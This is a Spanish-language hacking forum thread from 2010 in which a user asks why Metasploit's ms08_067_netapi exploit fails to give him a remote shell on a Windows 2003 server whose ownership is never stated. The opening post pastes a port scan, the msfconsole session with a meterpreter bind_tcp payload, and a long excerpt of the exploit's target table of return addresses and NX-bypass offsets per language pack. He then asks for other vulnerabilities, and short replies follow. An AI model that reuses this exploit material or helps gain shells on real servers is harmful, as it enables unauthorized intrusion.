Título: Problema para conseguir remote shell
Publicado por: Debci en 8 Enero 2010, 17:07 pm
Hola a todos, estoy auditando un servidor, que por la cantidad de puertos abiertos parece ser muy vulnerable, pero como ya comente hace tiempo, no puedo atacarle mediante el ms08_067_netapi, en puerto 445 abierto (sip, esta abierto), por que no detecta bien el paquete de idiomas del guind0$, estos son los puertos abiertos (que no se os caiga la baba): 7/tcp open echo
9/tcp open discard
13/tcp open daytime
17/tcp open qotd
19/tcp open chargen
21/tcp open ftp
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1027/tcp open IIS
1028/tcp open unknown
1029/tcp open ms-lsa
1030/tcp open iad1
1031/tcp open iad2
1455/tcp open esl-lm
3306/tcp open mysql
3389/tcp open ms-term-serv
8009/tcp open ajp13
8080/tcp open http-proxy
8085/tcp open unknown
8402/tcp open unknown
8443/tcp open https-alt
Bien ahora viene la parte técnica en la cual fallo: debci@0x81:/pentest/exploits/framework3$ sudo ./msfconsole
[sudo] password for debci:
_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|
=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 491 exploits - 225 auxiliary
+ -- --=[ 251 payloads - 23 encoders - 8 nops
=[ svn r8082 updated today (2010.01.07)
msf > use exploit/windows/smb/ms08_067_netapi 3
RHOST => xxxxxxxxxxtapi) > set RHOST xx.xx.xx.xx
rpreter/bind_tcpmsf exploit(ms08_067_netapi) > set PAYLOAD windows/mete
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 R2 Service Pack 2 - lang:Unknown
[*] Could not determine the exact language pack
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
Entonces, me puse a investigar (siguiendo un link que el compañero kamsky me proporcionó): http://www.pentester.es/2009/11/por-que-no-consigo-shell-con-mi.html Bien, pero en esa guia, se explica como hacerlo trasteando con un proceso .exe de windows, y yo trabajo bajo linux, e aqui el problema, de todos modos me puse a invetsigar sobre el exploit, en mi caso se ejecuta bajo el interprete del framework metasploit, y para mi sorpresa, si que tiene el idioma castellano, el cual es el probable del host, observen: #
# UNIVERSAL TARGETS
#
#
# Antoine's universal for Windows 2000
# Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET
#
[ 'Windows 2000 Universal',
{
'Ret' => 0x001f1cb0,
'Scratch' => 0x00020408,
}
], # JMP EDI SVCHOST.EXE
#
# Standard return-to-ESI without NX bypass
# Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET
#
[ 'Windows XP SP0/SP1 Universal',
{
'Ret' => 0x01001361,
'Scratch' => 0x00020408,
}
], # JMP ESI SVCHOST.EXE
#
# ENGLISH TARGETS
#
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 English (NX)',
{
'Ret' => 0x6f88f727,
'DisableNX' => 0x6f8916e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 English (NX)',
{
'Ret' => 0x6f88f807,
'DisableNX' => 0x6f8917c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Standard return-to-ESI without NX bypass
[ 'Windows 2003 SP0 Universal',
{
'Ret' => 0x0100129e,
'Scratch' => 0x00020408,
}
], # JMP ESI SVCHOST.EXE
# Standard return-to-ESI without NX bypass
[ 'Windows 2003 SP1 English (NO NX)',
{
'Ret' => 0x71bf21a2,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP1
[ 'Windows 2003 SP1 English (NX)',
{
'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL
'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Standard return-to-ESI without NX bypass
[ 'Windows 2003 SP2 English (NO NX)',
{
'Ret' => 0x71bf3969,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP2
[ 'Windows 2003 SP2 English (NX)',
{
'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL
'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
#
# NON-ENGLISH TARGETS - AUTOMATICALLY GENERATED
#
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Arabic (NX)',
{
'Ret' => 0x6fd8f727,
'DisableNX' => 0x6fd916e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Chinese - Traditional / Taiwan (NX)',
{
'Ret' => 0x5860f727,
'DisableNX' => 0x586116e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Chinese - Simplified (NX)',
{
'Ret' => 0x58fbf727,
'DisableNX' => 0x58fc16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Chinese - Traditional (NX)',
{
'Ret' => 0x5860f727,
'DisableNX' => 0x586116e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Czech (NX)',
{
'Ret' => 0x6fe1f727,
'DisableNX' => 0x6fe216e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Danish (NX)',
{
'Ret' => 0x5978f727,
'DisableNX' => 0x597916e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 German (NX)',
{
'Ret' => 0x6fd9f727,
'DisableNX' => 0x6fda16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Greek (NX)',
{
'Ret' => 0x592af727,
'DisableNX' => 0x592b16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Spanish (NX)',
{
'Ret' => 0x6fdbf727,
'DisableNX' => 0x6fdc16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Finnish (NX)',
{
'Ret' => 0x597df727,
'DisableNX' => 0x597e16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 French (NX)',
{
'Ret' => 0x595bf727,
'DisableNX' => 0x595c16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Hebrew (NX)',
{
'Ret' => 0x5940f727,
'DisableNX' => 0x594116e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Hungarian (NX)',
{
'Ret' => 0x5970f727,
'DisableNX' => 0x597116e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Italian (NX)',
{
'Ret' => 0x596bf727,
'DisableNX' => 0x596c16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Japanese (NX)',
{
'Ret' => 0x567fd3be,
'DisableNX' => 0x568016e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Korean (NX)',
{
'Ret' => 0x6fd6f727,
'DisableNX' => 0x6fd716e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Dutch (NX)',
{
'Ret' => 0x596cf727,
'DisableNX' => 0x596d16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Norwegian (NX)',
{
'Ret' => 0x597cf727,
'DisableNX' => 0x597d16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Polish (NX)',
{
'Ret' => 0x5941f727,
'DisableNX' => 0x594216e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Portuguese - Brazilian (NX)',
{
'Ret' => 0x596ff727,
'DisableNX' => 0x597016e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Portuguese (NX)',
{
'Ret' => 0x596bf727,
'DisableNX' => 0x596c16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Russian (NX)',
{
'Ret' => 0x6fe1f727,
'DisableNX' => 0x6fe216e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Swedish (NX)',
{
'Ret' => 0x597af727,
'DisableNX' => 0x597b16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Turkish (NX)',
{
'Ret' => 0x5a78f727,
'DisableNX' => 0x5a7916e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Arabic (NX)',
{
'Ret' => 0x6fd8f807,
'DisableNX' => 0x6fd917c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Chinese - Traditional / Taiwan (NX)',
{
'Ret' => 0x5860f807,
'DisableNX' => 0x586117c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Chinese - Simplified (NX)',
{
'Ret' => 0x58fbf807,
'DisableNX' => 0x58fc17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Chinese - Traditional (NX)',
{
'Ret' => 0x5860f807,
'DisableNX' => 0x586117c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Czech (NX)',
{
'Ret' => 0x6fe1f807,
'DisableNX' => 0x6fe217c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Danish (NX)',
{
'Ret' => 0x5978f807,
'DisableNX' => 0x597917c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 German (NX)',
{
'Ret' => 0x6fd9f807,
'DisableNX' => 0x6fda17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Greek (NX)',
{
'Ret' => 0x592af807,
'DisableNX' => 0x592b17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Spanish (NX)',
{
'Ret' => 0x6fdbf807,
'DisableNX' => 0x6fdc17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Finnish (NX)',
{
'Ret' => 0x597df807,
'DisableNX' => 0x597e17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 French (NX)',
{
'Ret' => 0x595bf807,
'DisableNX' => 0x595c17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Hebrew (NX)',
{
'Ret' => 0x5940f807,
'DisableNX' => 0x594117c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Hungarian (NX)',
{
'Ret' => 0x5970f807,
'DisableNX' => 0x597117c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Italian (NX)',
{
'Ret' => 0x596bf807,
'DisableNX' => 0x596c17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Japanese (NX)',
{
'Ret' => 0x567fd4d2,
'DisableNX' => 0x568017c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Korean (NX)',
{
'Ret' => 0x6fd6f807,
'DisableNX' => 0x6fd717c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Dutch (NX)',
{
'Ret' => 0x596cf807,
'DisableNX' => 0x596d17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Norwegian (NX)',
{
'Ret' => 0x597cf807,
'DisableNX' => 0x597d17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Polish (NX)',
{
'Ret' => 0x5941f807,
'DisableNX' => 0x594217c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Portuguese - Brazilian (NX)',
{
'Ret' => 0x596ff807,
'DisableNX' => 0x597017c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Portuguese (NX)',
{
'Ret' => 0x596bf807,
'DisableNX' => 0x596c17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Russian (NX)',
{
'Ret' => 0x6fe1f807,
'DisableNX' => 0x6fe217c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Swedish (NX)',
{
'Ret' => 0x597af807,
'DisableNX' => 0x597b17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Turkish (NX)',
{
'Ret' => 0x5a78f807,
'DisableNX' => 0x5a7917c2,
'Scratch' => 0x00020408
} Una vez dicho esto, quiero pedirles ayuda, como puedo hacerlo? estoy encerrado, no se como hacerlo, y conozco muy pocas vulnerabilidades que explotar, la que mas usaba era la ms08_67_netapi pero esta vez ha fallado, y hechandole con el sacner nessus y un autopwn tampoco tira ( no esperaba mucho de este ultimo -.-'). Admito vulnerabilidades posibles en el host. Si lo consigo lo masterizare como guia de ataque modelo. Saludos y gracias a tod@s.
Título: Re: Problema para conseguir remote shell
Publicado por: Shell Root en 8 Enero 2010, 18:28 pm
mmm a ver. Se ha hablado varias veces de esto y se ha dicho que puede ser problema de: Saludos!
Título: Re: Problema para conseguir remote shell
Publicado por: Debci en 8 Enero 2010, 20:22 pm
mmm a ver. Se ha hablado varias veces de esto y se ha dicho que puede ser problema de: Saludos! mmmm seguro que el hecho de que no detecte el idioma es problema del firewall? Saludos
Título: Re: Problema para conseguir remote shell
Publicado por: Shell Root en 8 Enero 2010, 20:25 pm
... y conozco muy pocas vulnerabilidades que explotar, la que mas usaba era la ms08_67_netapi pero esta vez ha fallado. Lo dijé por esto... :D Saludos!
Título: Re: Problema para conseguir remote shell
Publicado por: Debci en 8 Enero 2010, 20:28 pm
... y conozco muy pocas vulnerabilidades que explotar, la que mas usaba era la ms08_67_netapi pero esta vez ha fallado. Lo dijé por esto... :D Saludos! En ese, caso, que em recomiendas hacer ahora? Saludos
Título: Re: Problema para conseguir remote shell
Publicado por: R007h en 10 Enero 2010, 04:31 am
Primero, que brinde muchos servicios no quiere decir que sea muuy vulnerable...(cuando hay un buen admin xD)
Estudiate alguna otra vulnerabilidad, esa no es la unica que existe xD
Salu2
|